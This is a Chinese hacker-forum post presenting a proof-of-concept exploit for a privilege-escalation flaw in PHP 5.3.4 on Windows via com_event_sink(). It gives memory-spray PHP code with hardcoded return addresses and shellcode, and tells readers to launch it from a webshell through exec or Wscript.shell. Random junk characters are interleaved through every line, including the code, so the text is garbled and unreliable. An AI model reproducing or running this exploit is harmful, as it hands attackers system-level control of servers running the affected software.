|
|
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中" I7 @7 u6 I# s; E
7 c6 Z' [2 E5 f( C ]$ N测试方法如下:cmd /c x:\php\php.exe x:\test.php
+ P3 W& V: Y; n9 v7 o# @: ^8 D, z9 p6 |3 C
下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
; n- Q1 \; p- X0 x5 E这里是两个测试的截图:) u5 n, P9 U7 Z$ a( U1 k5 k
3 h" R3 W8 ^! j9 q( j$ a
' w! u8 D2 w/ Z( c+ j- Q/ {
. e+ c, ?1 d+ v( a9 S9 ^8 x9 o5 C2 S+ x- M: _+ x" t+ H
: c4 q! f: \8 O) p/ e- }
成功利用此漏洞的攻击者将获得系统的最高权限
: X" D+ C& N+ u; [4 X+ u* A z" x3 M! b+ ~
) [1 S# n/ G4 Y# u. m# G; b2 f
) |( J9 {9 k* Q( O% w9 t: x, f5 x2 K* ]
7 O) l4 ]2 W$ O* d# X关于漏洞分析稍后附上。一下是PoC代码:
, }" V6 n! T/ ?/ N, z/ Q, X# R: Q& c3 [% [$ s4 f
<?php
. C# Y5 Q5 G7 B$ v//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞6 F. C- d' K; c/ Q, h4 @( E
//$eip ="\x44\x43\x42\x41";2 h: N: _* X1 x v! G2 |
$eip= "\x4b\xe8\x57\x78";
' } F$ K+ ]* c1 p, A$eax ="\x80\x01\x8d\x04";" v. J+ U6 x2 {- I( ~
$deodrant="";1 ]) m& S& c* E/ j, l
$axespray = str_repeat($eip.$eax,0x80);" ~4 i; y; x! D% X# c
//048d0190
( }# \# A3 S! H+ R( K/ V; @echo strlen($axespray);% W# D; w- u" X- `0 P8 i
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
( m( h r3 ?( D9 {' a, `3 E9 Pecho "Silic Group Hacker Army - BlackBap.Org";2 e; K5 Z) D" S6 L8 e
//19200 ==4B32 4b00
2 D1 T# R/ f9 D! G" Efor($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}+ U; q2 a }! d# k
$terminate = "T";
& f) O4 \ J! ]$u[] =$deodrant;
- W( t1 _9 G7 S* [8 k$r[] =$deodrant.$terminate;& H/ _ J- u3 m' b4 j) A, E
$a[] =$deodrant.$terminate;, |" R# u" q) v+ a% D! M$ p6 p
$s[] =$deodrant.$terminate;
# X7 }* Q& R( z8 o( R/ Y//$vVar = new VARIANT(0x048d0038+$offset); 这里是可控可改的
" O ]; Y* ]* n* g0 D6 E0 i$vVar = new VARIANT(0x048d0000+180);
+ s# Y5 W5 I3 [* Q9 e//弹窗代码(Shellcode)
$ e! P: ]6 k5 A- I1 T" B: u0 u+ S$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";5 N% `5 p9 A' F% {0 X
$var2 = new VARIANT(0x41414242);
* P! h4 B+ V2 r# e2 rcom_event_sink($vVar,$var2,$buffer);
G {1 \1 h7 {. J?># x/ I9 L- a: b2 [7 \* R+ z, C
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|